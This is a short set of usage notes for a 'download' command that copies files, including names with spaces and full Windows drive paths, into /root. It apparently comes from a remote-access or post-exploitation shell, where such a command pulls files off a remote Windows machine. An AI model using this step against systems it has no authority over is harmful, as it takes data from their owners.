download test.txt /root/test.txt
# And if you are downloading a file with a space in its name:
download "test 2.txt" "/root/test 2.txt"
# Or if you're not in the folder the file is in, but know the exact path and name from search:
download "DRIVE:\\FOLDER\\FOLDER\\test 2.txt" "/root/test 2.txt"
# Example: download "C:\\test\\test1\\test 2.txt" "/root/test 2.txt"